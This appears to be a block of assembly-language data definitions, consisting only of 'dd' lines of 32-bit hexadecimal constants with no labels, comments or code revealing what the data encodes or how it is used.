dd 2ED97A29h, 0EC066992h, 551EE41Eh, 64A160A0h, 0D8E01033h
dd 0D9202FDBh, 0FA23124Ah, 0C6563C82h, 0F6283D7Ah, 7D6E8F7Bh
dd 5A8B72EAh, 0FEA29424h, 0B5F1AF8Ch, 0CE41B2CFh, 1668D23Ch
dd 55E46619h, 0AB728286h, 6C238A15h, 0E04B999h, 0E2705E7Fh
dd 5C29A226h, 6045C5F7h, 3D28A4C0h, 837FE690h, 6EEE7EA2h
dd 5385E87h, 259C67D1h, 0BFD34A82h, 0A66AA266h, 26A2FA54h
dd 2FB99637h, 8710EA7Eh, 0EE1B1A06h, 889A0ECCh, 0DCDD4D4Ch
dd 0B5A03C48h, 5CCB4208h, 7F5F7AA1h, 6672E5BEh, 0C1C3A8F7h
dd 2FB03D1Fh, 494FE57Bh, 9E08D758h, 0FF089A34h, 0C5B822FCh
dd 2D101030h, 9628B8F0h, 56D02A94h, 0C44A8086h, 7679B244h
dd 5EA2329Ch, 4970D9A5h, 384314D9h, 998965A4h, 8813D469h
dd 627F6F54h, 1255C9DDh, 2530AC11h, 1E1D7F50h, 75E07CA4h
dd 316BF5DDh, 0C41571B6h, 0F3E86487h, 0D667519Bh, 0D1B3EA6Ch
dd 37BA53Bh, 0DE7E89E6h, 1EE885F9h, 941062CCh, 6DAF45DBh
dd 893F4F9h, 0D98FE7D4h, 658C204h, 0B94FE58Dh, 0A5E2F757h
dd 36E5CA02h, 0C13502F8h, 0A61052B8h, 19626D4h, 0A445A16Bh
dd 2B18B4D7h, 8B7BAE84h, 5EE05B13h, 48FF62F4h, 0C9F31DB3h
dd 8E85F9FBh, 0BE2892FCh, 66D6B09h, 5DD874B7h, 5BB517CDh
dd 4F88C442h, 26B11BE0h, 5BC7F35Dh, 26A6C116h, 81CC563Bh
dd 0E07BEC81h, 2A5A5F6Ch, 86180FC4h, 8348B21Ch, 2D9FE7F5h
dd 719262FAh, 0FD5A2FA9h, 6CF8124Ah, 96244A19h, 2ADBC206h
dd 0C3777C88h, 9E3E698Ch, 73A7EAF9h, 4E8E39DEh, 0A63A7AC0h
dd 0E4021161h, 56C9C2CCh, 0EC9582ECh, 0CF8E7025h, 370BC2E9h
dd 801CEA61h, 6FCE74Ch, 0F35978ACh, 0BE1EAE9Ch, 434308A3h
dd 6ED84244h, 2BB1C704h, 1EBEE9C5h, 4A84D73Fh, 0B2BBA23Ah
dd 2990F240h, 7EE8EB38h, 0DEAC2B14h, 7A98026Eh, 86F15EACh
dd 44DD4D1Ch, 0BDA03C4Fh, 0AA7CEF30h, 0E650BB20h, 0D6A8782Ch
dd 96006AD0h, 0EE0A907Ah, 0D025E5D3h, 0AD0844E7h, 0F2F747FDh
dd 1FB8228Dh, 0F71210B5h, 0FE00D356h, 4802A94h, 957A1713h
dd 83E6DA72h, 0E93466Ah, 0B724E2A0h, 0F12FE24Ch, 64F01E10h
dd 2BD792FCh, 16B6D616h, 1A18C7F5h, 96247912h, 1EE226D7h
dd 20B71BE6h, 0F5E237F3h, 0A3C9FA52h, 2838277Ch, 0ED063FEBh
dd 7915025Ah, 0ECA70880h, 49C5EA58h, 36A00B70h, 0E4385167h
dd 4DA3E334h, 6EF8422Ch, 0C4503A84h, 0D53257D3h, 82311AB2h
dd 9E0870D4h, 0FE44BECBh, 728AB773h, 59437AD2h, 0C854E0A9h
dd 52027794h, 0A42602ECh, 8D36DB31h, 68DD4A11h, 3B3969F4h
dd 3868E2D9h, 300139A4h, 7EAC4003h, 179F625Bh, 0EAD742ACh
dd 0C6309B14h, 6BB2CCDCh, 48600CA4h, 0CFBCAD0Ch, 0A690FA65h
dd 8F9D7282h, 867E2B52h, 5BDF4C25h, 403FD186h, 0F507B35Ah
dd 36CA5BBAh, 71AB349Dh, 0D06C90B1h, 0FF934B7Ch, 96DFEFDBh
dd 6BD5C22Ch, 46860415h, 926072B6h, 0A660CA34h, 642DDDDFh
dd 9B104CD8h, 0FE68D230h, 567FAF9Bh, 1FF182ECh, 8770DA44h
dd 179A62A2h, 13A585A2h, 8D78E24Ch, 5A7C3262h, 27AC9DF1h
dd 2A80EA54h, 0C22B378Ch, 433FA038h, 1E88F2D0h, 56C04719h
dd 0EF05822Ch, 53E49F03h, 5ED4FEC3h, 0A8C1D661h, 5AF02293h
dd 7812FB0h, 0E438B162h, 5ED5255Bh, 8E07250Ah, 0F6EA8B2Bh
dd 0C9A8125Bh, 3FF3836h, 0EE6EF9E6h, 16E0DAB7h, 97E0228Ch
dd 0B260CA34h, 22D655E3h, 0A6741B8Bh, 0C25247C3h, 96452AA2h
dd 672BB498h, 3A145FCDh, 369932AAh, 362088F4h, 5E2EB31Dh
dd 5AEEAF5Bh, 2BA592CAh, 16B6F1C7h, 3A1171FCh, 9762CA55h
dd 6C1D0D0Dh, 0F1E07C8Fh, 5BC78608h, 26A6C122h, 0F3689144h
dd 0D676BF7Fh, 445BFB6Dh, 79F130C5h, 0DA3B4D2Fh, 8B201F8Bh
dd 8ECE22C4h, 630ECE25h, 0DF266BCh, 25D0E10Fh, 0D208C127h
dd 5B07AF09h, 248372EAh, 0F660CB38h, 4FB0A807h, 5E137AE4h
dd 75081917h, 3766D95Fh, 4C5F8798h, 855E31B1h, 0D59B3D5Bh
dd 62ABDD38h, 4E12B61Ch, 99BA68F5h, 822E0703h, 9B0BEA62h
dd 6EEE79D6h, 0ED3C5E87h, 19617193h, 768A4D73h, 81B1A2E4h
dd 69C33967h, 3FBF06FAh, 9B1CEF46h, 41EA6105h, 0F29635B7h
dd 0B021E540h, 45D76510h, 0FC8D2190h, 923EDF56h, 4DDA772Ah
dd 0CA6E05BDh, 8228BA69h, 34D568EBh, 0EC6926DCh, 0BE14AF53h
dd 4ECC51E3h, 0F6107AE6h, 2EE7A069h, 32A358FDh, 0CB71F8C2h
dd 6A00F422h, 1D817C9Ch, 0D353AABFh, 6F1B9623h, 33DA5DC7h
dd 9E7AD7AFh, 5FCFA033h, 18FE62E2h, 0B344E86Dh, 1E60A756h
dd 2BE04AB4h, 0D09B4F8Dh, 0A356FA52h, 7EDE47D7h, 48D55514h
dd 0EF983457h, 0BA84452Ch, 6BC3AC76h, 36963122h, 0A0C4CE95h
dd 67369051h, 4BB5ED42h, 0CCBDE7F7h, 6558F410h, 0E3E718F2h
dd 1B85D7BAh, 0F656FDE5h, 794FA703h, 2FEA7AD2h, 0B0E4287Ah
dd 5771D16Ah, 0CFF34D0Eh, 0F98BC5ACh, 7AB4B163h, 0E3558EFCh
dd 4E70678Ah, 8ED03A92h, 0BE2892F4h, 38C3AC07h, 6E940EE8h
dd 0FD9A0FFBh, 0DE83F26Ah, 1C735DC0h, 5BC7F10Eh, 26A6C136h
dd 769C9239h, 96482FEAh, 0FE67025Ah, 7874B257h, 0D5A04DE3h
dd 65A00A74h, 0C1A7218Ah, 0AA149477h, 0AB571230h, 9636517Eh
dd 11A6ABC4h, 0B35EF27Bh, 13F78D23h, 0F656D8E5h, 0CB35EBBFh
dd 0A6263AE0h, 0AF39836Dh, 7917BC4h, 95BE1713h, 0D98DA72h
dd 0BC8329Ch, 8572CFA7h, 423CCC7Eh, 0F32F3AE8h, 0BE1EA956h
dd 1680E0BCh, 1EAB35ACh, 0B25EF376h, 4E88B33Ah, 4DB2DF4Bh
dd 4BB1A23Ah, 26A6C13Eh, 0F36563B3h, 0D676B365h, 12F887E5h
dd 79A15AF2h, 0E8731889h, 32C89974h, 3F862CCh, 0D049C491h
dd 83254B7Ch, 96365692h, 11AD6DC4h, 0C3777C7Bh, 9E3E6CB6h
dd 53E39A34h, 4E8E3CE0h, 8C85F7E4h, 0AE68E422h, 3CC140C0h
dd 0AC70D0ECh, 0F9F0DA44h, 68F47809h, 0ECE00FF4h, 83F5C039h
dd 66E624F9h, 332EF8AEh, 209E80E1h, 3E8E16ACh, 3962CB54h
dd 28B4BCC9h, 0E31F12B4h, 0CE0E9E4Ah, 18F77FA2h, 96E8528Ah
dd 0D640AA18h, 6DD7513Bh, 0A8C2698Fh, 0DE04FE58h, 0D0A9F8Bh
dd 0E66B62FAh, 0E650BA23h, 267DA7F1h, 1B596AE2h, 0D864D491h
dd 0B39AF284h, 92E08D23h, 0A160CA34h, 0F16CC5h, 0E23E2EA1h
dd 1689E70h, 60FB8001h, 0A1D807ECh, 672EFC0h, 5BA0A19Ch
dd 3B208AF4h, 3861F1F9h, 0DB5D63A4h, 0BE1EAECEh, 0E97419BCh
dd 5865C153h, 0C630AC38h, 1C987653h, 9A614AB4h, 0CE38A39Ch
dd 27919230h, 0EB1752BCh, 0D6769602h, 2F08C6EDh, 0DA05AC4h
dd 8C48D8C8h, 0A969F8Bh, 4E7D62FAh, 8E5DCF7Dh, 3EA801F4h
dd 0ADCAFF2Bh, 0CB3C21Ah
dd 58DCA707h, 0EB0872EAh, 86E5471Dh, 1EB81492h, 9A32EF1Bh
dd 3EEDD20Ah, 5749AE9Bh, 0EE9382ECh, 0F9705148h, 324DBDACh
dd 7020BCEAh, 384685C9h, 66BA3BA4h, 0BC429396h, 2AAE7FABh
dd 965B429Ah, 0A6B495FBh, 8D88F25Dh, 6888DF39h, 0DE52A23Ah
dd 0B36FA936h, 7EDE6EA2h, 534F6A91h, 2E98032Ch, 9872E749h
dd 0D6F9B22Ah, 0C95A239Ch, 8E6C0A33h, 0CD0EBA24h, 1A9C9B9Ah
dd 34959580h, 6358F417h, 70AE8A39h, 7609C3DCh, 99F303Eh
dd 50C5B701h, 0A67A7AD2h, 0FE68C654h, 0A9937894h, 9824A879h
dd 22345744h, 5A5DBF88h, 0E620BCB4h, 85725443h, 0A7C41EE0h
dd 0F42A9A1Ch, 14CAF855h, 65DB08BEh, 4638BE40h, 0FE49FDBDh
dd 32EB1BBCh, 0FCC7B228h, 4E2D7734h, 96E86480h, 0D640AA08h
dd 56AE2C49h, 0A8D074E4h, 0FB6D883Ch, 4E982451h, 0ABD81AE9h
dd 0A91AB057h, 3E885C35h, 0CC959583h, 6F58F417h, 46B0B640h
dd 0CE0818DCh, 639F9963h, 4E8E1EA6h, 0B394F76Fh, 0FE02D20Ah
dd 9FAB3177h, 0ABF0D3E1h, 2070DA44h, 5EC256B9h, 0ECB575A3h
dd 8D78D477h, 8D803660h, 0BE2FFAF7h, 0AB0DEA54h, 6EEE5C3Ah
dd 53CFC953h, 1EBECE76h, 229E8A31h, 0F2501781h, 8313FA52h
dd 7EDE4738h, 0B1CD2714h, 5983452h, 0D7F0300Ah, 4BB7E14Ah
dd 36963652h, 0F0F89A4Fh, 18DB2B0Bh, 2C0A7F1h, 9BB06AE2h
dd 0FE2D6CDEh, 0BCA7F2E4h, 0EC698D23h, 7B692923h, 0A45323FBh
dd 683BB56Fh, 0C2006FB1h, 0F2332AA2h, 17F3756Bh, 1CE52517h
dd 0DEC804A0h, 8035E149h, 240CE34Ch, 66A50ACCh, 74BD6DFCh
dd 9680DC6Fh, 58E62511h, 0D7449A04h, 0E4779Bh, 76E04A82h
dd 4BFEA20Ch, 26A6C403h, 80E0BBBCh, 538755EBh, 2EAE1718h
dd 6F05AC4h, 0DE4C7041h, 16EF0079h, 0E0970DA2h, 0C636D504h
dd 5BCE7B10h, 0B64F4AF5h, 8B35AB58h, 66DF6EA4h, 0FB6417BFh
dd 8201B856h, 44B503E9h, 86305AC4h, 8D489D1Ch, 33AD47E1h
dd 0CF7FA29Eh, 6815BE36h, 0CC23FBDh, 0D845E691h, 7D1D8E38h
dd 46A956D7h, 0CE58F394h, 78E1CA2Dh, 16BD62C8h, 0B253FF74h
dd 32FC9C3Dh, 17943994h, 0A051C662h, 0BB0C003h, 1FBF58B1h
dd 0BF28C960h, 4FB86502h, 0E2D036A8h, 0BF68CB7Dh, 58806E1Ah
dd 0FA9005A5h, 89369A08h, 4CCE320Eh, 0F26E0FBDh, 0CE11E25Fh
dd 32D97BF3h, 0C9027FE6h, 9312AF5Ch, 2BCA43ACh, 0D37F03C4h
dd 8C0EF210h, 32AE4FFDh, 0ED38BD9Fh, 2715B72Bh, 7EBC7BBCh
dd 0C200F99Dh, 2F1D8F25h, 41A47384h, 0DF44B28Fh, 0BEA18F20h
dd 0F994E00Dh, 0C2080873h, 1DB835D8h, 0A6AF9ECEh, 0E7818068h
dd 89805C70h, 0F1883CC3h, 8A87C28Ch, 2E5A6EA0h, 38C508h
dd 0FE505713h, 36BE6937h, 8EF862CCh, 0E650BA24h, 3EA8127Ch
dd 96006AD4h, 0EE58C22Ch, 46B01A84h, 9E0872DCh, 0F660CA34h
dd 4EB8228Ch, 0A6107AE4h, 0FE68D23Ch, 56C02A94h, 0AE1882ECh
dd 670DA44h, 5EC8329Ch, 0B6208AF4h, 0E78E24Ch, 66D03AA4h
dd 0AE2892FCh, 766C0382h, 510CE72Fh, 45309A32h, 28B72AF9h
dd 0C1EF4AB4h, 9DB5B64Fh, 6D27F57Ch, 0F53851BAh, 0FD648E50h
dd 37EA0E2Eh, 0F5F818FFh, 0CA0A3908h, 0BFAC485Fh, 0B8C7B659h
dd 3ED53324h, 0D5A82443h, 0BEC2E9D1h, 2C391BCEh, 0C3381A80h
dd 9E3E56BAh, 0F660AEDCh, 4E984A8Ch, 239D7AE4h, 0FE5EF1AFh
dd 22D813CDh, 0AAD801E0h, 838F2DA6h, 5EFE0D28h, 0B5F97D37h
dd 385C84C1h, 99C0D9A4h, 0BEA76E8Ch, 0F48402D7h, 0FD45CB5Ah
dd 4530AC27h, 1BFCF266h, 4E3789Fh, 32762F1Ch, 0A5CEA13Ch
dd 7A9C5286h, 0D5AB98EBh, 0C6887093h, 790FA593h, 53637C37h
dd 369635ACh, 0BAB36194h, 5ED535E7h, 0F9A82443h, 0A03FDE51h
dd 0EE58C22Ch, 468CF284h, 1B8372DCh, 0F656F580h, 0B14EB464h
dd 0A608921Bh, 43EBD23Ch, 56F61520h, 2710F7ECh, 3054D5D9h
dd 0A154D99Ch, 801F3E79h, 8BF7214Ch, 66E6051Ch, 819C0775h
dd 1568EA62h, 5DD842ACh, 55BB59CDh, 1E88F2DCh, 880DA2E6h
dd 5B3B5DF3h, 26A6C5BCh, 46B84BFh, 524FAA18h, 2E98036Bh
dd 86E02047h, 0DEB53613h, 742B0A74h, 461032C0h, 0E5AF45DAh
dd 897CAF9h, 0C6C669D4h, 17D8CAA6h, 0C6A96E84h, 9D7C5C25h
dd 7D912174h, 0AF3923C4h, 79CFA53Bh, 0B22C2BBDh, 0BAB52AD8h
dd 2DD0A9B5h, 897F20BDh, 5EC8322Bh, 48580B92h, 8B77D07Fh
dd 66D03A0Fh, 0BE1211AAh, 5C0BEF21h, 0E5DAA9BCh, 97C1990Eh
dd 0E17680B4h, 0AE55494Bh, 63389433h, 0DDE83AE1h, 7E6CD6B3h
dd 63BFAA14h, 2EAE3DB4h, 78A5B294h, 5B4B4DE3h, 369635ACh
dd 0B120E743h, 0E253BA12h, 0FE2B4158h, 99DB59D6h, 0FCBBCA9Ah
dd 1590D304h, 9A2C561Dh, 0DF44D61Dh, 0EE30680h, 5D91930Fh
dd 23D30533h, 0AD4114E0h, 7576C744h, 0FDF1EC30h, 0A16909C5h
dd 4DA1A480h, 0A2CDC09Ah, 9D511CD0h, 4D707B6Fh, 0ED01F420h
dd 9D80ABD1h, 3DB18C70h, 0FFADCD1Ah, 8D6144C0h, 2F1D9D3Ch
dd 0B36FFC10h, 7EDE6D04h, 2931434Fh, 0ADC6FD93h, 69194E06h
dd 1DB74DE2h, 6EA46075h, 710D5424h, 0A6C532DBh, 58A8245Ah
dd 94185B6Ch, 0EDBC02CEh, 0EDD6F886h, 765074B6h, 99F3F2Fh
dd 0C9B0E00Fh, 0FE151035h, 19DDCD4h, 553AAA6Bh, 0FEA8899Fh
dd 20305F46h, 0B56232AAh, 0EE48E0D3h, 0D8262E6h, 776022D1h
dd 41DC7C14h, 168152ABh, 0BC5C42ACh, 26E19770h, 0E86338A2h
dd 76584F5Fh, 65B8A20Ch, 0AB534586h, 48D0E229h, 21978114h
dd 0AB6FC1B6h, 86C66261h, 0D648B21Ch, 0F7609F7Bh, 0B0E692Ch
dd 0E6668287h, 58AE677Dh, 7D25E3D9h, 4DDD343Fh, 44B02CBCh
dd 936E74A9h, 0F28BEF05h, 6BB92FEAh, 1AF8D182h, 75972DC3h
dd 0C3491ED7h, 0AE2EBD20h, 838719EFh, 5EFE0A39h, 0BE208AF4h
dd 0AB87743h, 0FA389018h, 37D76D03h, 20BF3AC1h, 0CD5DB4ACh
dd 0C730AC3Ch, 2F87F629h, 0B6CB485Fh, 4BCF61A7h, 26A6C2C1h
dd 76E852BCh, 53CA8D60h, 2EAE3AF3h, 0E0FBBA05h, 0B80D3911h
dd 9C58BADFh, 0B667E746h, 691BA12h, 5ACF1767h, 0A5AB6C5Dh
dd 5F3A4ECh, 0C9D4A296h, 14A372D9h, 0C05855B1h, 8FE0268Ch
dd 65BB6204h, 0DE832E8Ch, 562B92F2h, 0B7F3298Ah, 0EE28DE2Eh
dd 0A137C163h, 77F28E79h, 0B1EEAACh, 0CDB6FA2Dh, 2E989117h
dd 4E8280FEh, 912BA444h, 0B2E21EFBh, 4680986Eh, 8913905Ch
dd 0BCF25CF3h, 0D8558EA7h, 80212676h, 289BDEDEh, 0D09476A6h
dd 78FC2E0Eh, 6E44C6D6h, 866DE18Dh, 3E318931h, 569551D1h
dd 0FD69F984h, 0AEB0D759h, 6BAFC21Ah, 46862221h, 1E0872DCh
dd 96D0C940h, 0EB3DD526h, 0A6104CDCh, 8A60D23Ch, 0DD959293h
dd 0E1B38200h, 3ED55FB3h, 5ECB32AAh, 322F8BF4h, 0E78E29Bh
dd 0CD7AD214h, 81942F75h, 0FE30EA62h, 0D351E906h, 0C606A5C4h
dd 262D77ABh, 76E34A82h, 0DB4CA20Ch, 1E357F93h, 7EE8528Ah
dd 0D334AB14h, 0D166C384h, 2C19EA3Bh, 62CD39B7h, 0BDA03C4Bh
dd 7304903h, 0D06F7E99h, 0C2E09B7Ch, 69640D6Ch, 2E6B691Ah
dd 0C347B1E2h, 9E3E4A79h, 0F660CA37h, 0CB4E2CF8h, 0A6264247h
dd 166DA6BCh, 0A93FD4D6h, 277CE554h, 0C6437162h, 0DB3F99FAh
dd 0B616B251h, 0E78E24Fh, 0E3266FD0h, 0BE1EAA5Fh, 0FE859FD4h
dd 9127BCB2h, 39CD3EECh, 0F6A842A3h, 891FB102h, 765E9BEFh
dd 8DF6EF9Bh, 0EB63F92Dh, 0D67692B1h, 0EC6FD09Bh, 86F05AC7h
dd 0A0A0A669h, 865FF589h, 75688AD3h, 5E3645DBh, 95CE0783h
dd 598BC145h, 0D19C47A7h
dd 8E9B1AB2h, 69F43A55h, 0C0586FB1h, 4EB8218Ch, 513E0EE4h
dd 0C85077B9h, 56C02A94h, 593AF6EAh, 30487FC1h, 5EC8329Ch
dd 5E25FFF5h, 0F1871FBEh, 5E75BF53h, 0BE2892CAh, 13F4EE54h
dd 91264F44h, 63B56DFBh, 1A88C464h, 2E04AB4h, 305F4A1Bh
dd 0F28059Bh, 0D520AC7Ch, 0A280A2ACh, 5B20A968h, 2D97B13Ch
dd 0E6ED37EBh, 36A80A42h, 0C18D62CCh, 0DEF307A4h, 4AA8124Ah
dd 683B8292h, 0C7E03DD3h, 4C79339Ch, 0A830ED79h, 0F5840A34h
dd 76278786h, 16BB7AD2h, 7BE2788Dh, 56F61237h, 0A4583246h
dd 304845C1h, 0E6AE989Ch, 33D77716h, 0E4EDAE9h, 66D03AB4h
dd 0F7989588h, 63388CFEh, 0DE732450h, 60330ECh, 0B6357BF7h
dd 81E07C8Bh, 0F8000789h, 2690DA64h, 0CEE127BCh, 4BC5A04Ch
dd 84983454h, 4671E2A2h, 0E6ED37EBh, 36E00A42h, 8D8C62CCh
dd 0EC787EA4h, 8908FD9h, 1FAB0CD4h, 0D8676E91h, 0C347B184h
dd 9E3E4A79h, 0B660CA34h, 1E082BF9h, 9E8DFFE6h, 9C2D20Ah
dd 60F88F11h, 0AE1802ECh, 0B67BAF44h, 0C04D3824h, 1C20BCCCh
dd 0B61EDFA7h, 0E3272295h, 0BE1EAA59h, 1680EB54h, 476840D8h
dd 0FEAE3F0Eh, 0FA48F26Ah, 0E84540B7h, 0A8389434h, 0A7289CCFh
dd 0DB6DA54Ch, 0D6409C2Ch, 5B98026Eh, 8C38EEC6h, 0E8702CB9h
dd 0BF0B6C74h, 0B8C7AA71h, 0CEE00224h, 0C903127Ch, 0A038CF51h
dd 0EE58CA2Ch, 0AEC16E84h, 61F78FEDh, 0CEC54FC3h, 4AB822BAh
dd 0AD657AE4h, 7B626A8Ch, 56F6120Bh, 59556946h, 30487FC1h
dd 5EC0329Ch, 0D031FFF4h, 49861F4h, 50E8A501h, 8D83F4FCh
dd 36B4094h, 76F1FACAh, 0FEAF3F0Eh, 0FA48F26Ah, 0E94540B7h
dd 0A8389434h, 83150DCFh, 7EE86484h, 0B040AA04h, 5A5883D4h
dd 8E34DAC7h, 0E6D71716h, 9DC60A42h, 2D7DD4C3h, 4D508C1Ch
dd 0C154D294h, 33859D2Bh, 0EE58F414h, 32F01A84h, 9C58C2D5h
dd 0C05857B1h, 0CB4F888Ch, 0A6264241h, 0FE68F23Ch, 54B5AC24h
dd 0E19586E8h, 9BD550BAh, 0D7C804A4h, 801F3A79h, 8ED3844Ch
dd 61A53F58h, 0F1A8924Ch, 0FE2AAAABh, 9127BED5h, 0FE951FF3h
dd 5E88F26Ah, 0CE864AB4h, 0CC4D936Ah, 8DF6D3D0h, 0FBE24A0Ch
dd 0D676928Bh, 849BE2ACh, 790C0E2Ch, 29C002E3h, 98AFF1h
dd 8E7862CCh, 5652CF24h, 0A30D98FAh, 0F0005CECh, 0EBA44287h
dd 46001DF1h, 0DEF73D5Ch, 0A4B229Eh, 0CB4FDD73h, 0A6264241h
dd 0FE69D23Ch, 167021E1h, 968507E6h, 0EDDADA72h, 0DD705493h
dd 2B858034h, 6878D474h, 0CCD18A0Fh, 868D170Bh, 1680EA62h
dd 41AD42AEh, 0FE951FF3h, 1E88F26Ah, 6C954AB0h, 4B3262BCh
dd 26A6C2FBh, 464CF736h, 3681AA22h, 4820647Ch, 8640F145h
dd 9EF8BAF7h, 0E3F8F7Eh, 795262FAh, 0D0681FA1h, 36A8127Ch
dd 0F0101FD4h, 0E4B04194h, 70888421h, 2EA314DCh, 46682135h
dd 0D03D28C4h, 0C104CDCh, 0C6CD57CBh, 56C02AA2h, 0DBA982FCh
dd 0BE16FF31h, 0FBC2CA1Fh, 0B616B26Ah, 0CE4B492Ah, 0D66D130Eh
dd 4928A4C3h, 20B84FD1h, 4ED842ACh, 772FEF04h, 7893192Bh
dd 7CF8430Ch, 0F8003CA9h, 25743A64h, 4676F7B6h, 7D26AA22h
dd 1128BF45h, 477A5AF2h, 0E1F81796h, 9DC60A42h, 0BFA3A7Ch
dd 0E66682B9h, 9B2DE5D6h, 95005CECh, 9A59C22Ch, 0E335EDA6h
dd 9E0844E4h, 8364CA34h, 0EB3DD59Ah, 0A6104CDCh, 8B6BD23Ch
dd 0AC44C291h, 5F07D13h, 0F18F25BEh, 68F09719h, 0B6208AF4h
dd 0BE7B9644h, 0E327906Dh, 0BE1EAA59h, 9680EA54h, 696862D8h
dd 0FEAD1F2Eh, 0FE49F26Ah, 7E6947AEh, 6B3AA228h, 26A6C2F9h
dd 0FEEBB67Ch, 66EBAED0h, 96FEA80Dh, 23FABA3Bh, 0DE7E8A81h
dd 0B357A112h, 8ECE5A69h, 0E650BA04h, 0BB5F4108h, 96365271h
dd 0CE58C22Ch, 814717F0h, 9E0872DFh, 66D0CF40h, 0C54BC926h
dd 0E9DF123h, 0D568E403h, 0AA81A355h, 2B12DA5Ch, 646E2D9h
dd 0FB4DC536h, 0B620BCCCh, 7A78A24Ch, 36685CA8h, 23AD983Fh
dd 0FD80DC6Ch, 916024A6h, 5B9590E4h, 7888C464h, 0D365BD1Fh
dd 0CD389434h, 5291FA64h, 0DB6DA5CFh, 0D6409C2Ch, 5AB8026Ch
dd 8537ADC9h, 0AA48B21Ch, 9C30BA71h, 41739127h, 0D9903FAFh
dd 0F683124Ah, 0A5FC225Dh, 4BDD35E5h, 46B02CBCh, 0EB08F2DCh
dd 6BE5473Ah, 0C4B814B4h, 5F903AECh, 7390A13Fh, 7284E790h
dd 4ED982FCh, 0ADFB6A4Ch, 0E6AE347Fh, 1D464AC5h, 8EF75A2Ah
dd 66D082CCh, 0D8C990FCh, 932BB2FFh, 8DE3765h, 0A0F0ABBCh
dd 0B44B42F7h, 4E50CF39h, 4BCFA23Ah, 26A6C2C1h, 6EE852BCh
dd 0FD17AC61h, 37735A94h, 0ADD8094Fh, 559899E4h, 9FC2F9h
dd 266D63CCh, 0E7508C1Bh, 1AEC9945h, 0F1BDE3D0h, 6558F43Ch
dd 708FB639h, 368D59DCh, 160FC0Bh, 78808709h, 0A6103AE4h
dd 96AA63Ch, 5202814Ch, 2D4FD4ECh, 304F3AF9h, 0DAC7329Ch
dd 0B6208B2Dh, 0E78EFA4h, 349571A4h, 8D64D7B2h, 5AC4C466h
dd 0FB2742E0h, 0C606A196h, 217C77D5h, 0FDB34A82h, 163B9E54h
dd 0ADB8899Bh, 9E0066FFh, 5DBF55E1h, 18A7D6F9h, 0C4F301C4h
dd 26CD3B10h, 35A03C4Bh, 0B716A8Eh, 0E66685D8h, 0C18061F7h
dd 9600EA67h, 1BE12A2Ch, 0FB3BE57Bh, 9E3E4D08h, 3CD2262h
dd 0DB33DD73h, 0A6264530h, 0FD6098B7h, 98EB26DEh, 0A11D6B6Fh
dd 671BACCh, 44C3D9Ch, 0B5208AF5h, 38473AF9h, 0FE6539A4h
dd 1228A4C3h, 938F0268h, 6ED8420Eh, 0ED34DC89h, 28B76AD9h
dd 26E649B4h, 31CDC8E4h, 0F22D799Bh, 7EE86483h, 917BA161h
dd 351B0D60h, 6DF05AC5h, 0ADD8B10h, 39A03C4Bh, 8EF96F49h
dd 7ED5B924h, 58A82443h, 0B3FF5255h, 0EEA44723h, 63B1A84h
dd 0AA4B59DEh, 34D2264h, 0F381DD73h, 0A6264530h, 0FE8C5733h
dd 0D3C32A94h, 0AE2EBD34h, 39E85F47h, 5E4332AAh, 0B92CCDDFh
dd 0E782FCEh, 6E9701A4h, 0BEEC11F3h, 0D603EA54h, 7A9F41AEh
dd 0F9A81F07h, 4EDAF26Ah, 4914FF4Bh, 5BC7A23Ah, 26A6C136h
dd 7128D7E6h, 0D6401D91h, 2E04EB6Ch, 79CC5AC4h, 0DEDC3713h
dd 8200A74h, 57D6DD9h, 6D50BA24h, 7D83133Ah, 2AE83AE0h
dd 0D7A73DD8h, 708FCE39h, 9D7F07DCh, 0C05F12B1h, 0D63D218Ch
dd 2F104CDBh, 0C828D2B9h, 6DC0A194h, 98277A69h, 3D78A844h
dd 68F7CE19h, 8B49F8F4h, 7E78E24Ch, 79380DD6h, 332892FCh
dd 0D70B161Ah, 2CDB4087h, 0C6B5A114h, 6B88C41Ch, 6624C9B8h
dd 8AB793F3h, 0CDF1E640h, 0FB6791A7h, 0D67695ACh, 0B62D890Ch
dd 6EF06CFBh, 21B74746h, 36A0A315h, 808DE2CCh, 945CFD0Fh
dd 36EF2975h, 693CE8DBh, 0E1113DD3h, 0B94EA801h, 0BA34F923h
dd 0DEC56DB5h, 0B147228Ch, 0E4FB051Bh, 9E4C98BDh, 18202A94h
dd 0A29342DFh, 0E6F55D60h, 0D7C804A3h, 801F5671h, 0A7C16F4Ch
dd 65D03A8Ch, 88170A79h, 0B3258C54h, 6D1E69E2h, 841B8E46h
dd 0E5CE3450h, 24618D5Ch, 0CB38A20Ch, 0AF90FA64h, 20B7AEFAh
dd 43BFFDD7h, 2EAE39F2h, 89EFB205h, 0DE49A899h, 5CF45A74h
dd 710708E4h, 0D06B44B1h, 6168977Ch, 9705E2DBh, 0AEB0C22Ch
dd 0AE4FE561h, 9E0872CDh, 0B014AF67h, 1DDD4EE5h, 0D4651981h
dd 0BF11A655h, 3A75D594h, 5118B4D3h, 304B88D1h, 2A4DBB9Ch
dd 5E20BCCBh, 0E78E255h, 7845FF7h, 0C967F797h, 65F28F3Ah
dd 3EA82BC4h, 0AF46F376h, 7BEF9730h, 67081DB4h, 26C75DE5h
dd 2690FA77h, 1BBA37EFh, 0A42FDE67h, 47EA5209h, 0E39C33B2h
dd 8948D77Bh, 0C948F99Ch, 8EEA8A33h, 8303BA24h, 55CB733Eh
dd 0E4501AA1h, 8231B445h
dd 46D57DE1h, 76DE9A8Bh, 0EE8835CBh, 1DB8228Ch, 0C7783981h
dd 0B00DB552h, 30A95EFBh, 0C76AD295h, 631CB332h, 9C857FBh
dd 49C8391Ch, 832CB2B3h, 50EA8A21h, 0EE4CF8FCh, 0E9D7EB3Eh
dd 58E44839h, 0E20C1304h, 25CE67A3h, 0B6CA4A82h, 0F0501F81h
dd 76C0FA52h, 0CE5DADECh, 0BE409C2Eh, 2E9C026Dh, 0D1F13090h
dd 0E13C27E3h, 5CF40A42h, 1B0735C8h, 0E6668550h, 0C1BCD6FFh
dd 0A03F0661h, 6CCD3D2Ch, 19B02CBFh, 0F6BDFF1Fh, 0A060FC0Ah
dd 753EB773h, 5E937AD2h, 45ECDDC3h, 0DFC02A94h, 9827FA69h
dd 5070B044h, 650AA763h, 76A58AC2h, 0EDC6643h, 0A6FB3AA4h
dd 0BD42C2ACh, 7E818004h, 0AED842ACh, 0A4A56552h, 9D88C467h
dd 0F2EFB54Ch, 0CE38A7E4h, 19EC7FEDh, 0F365528Ah, 0D6769594h
dd 111097E1h, 0D4A15AF2h, 2118B276h, 9B84E1h, 7100E1CCh
dd 0E3E63E2Bh, 3EC2127Ch, 0A97CDF2Bh, 7BA7C21Ah, 4686210Eh
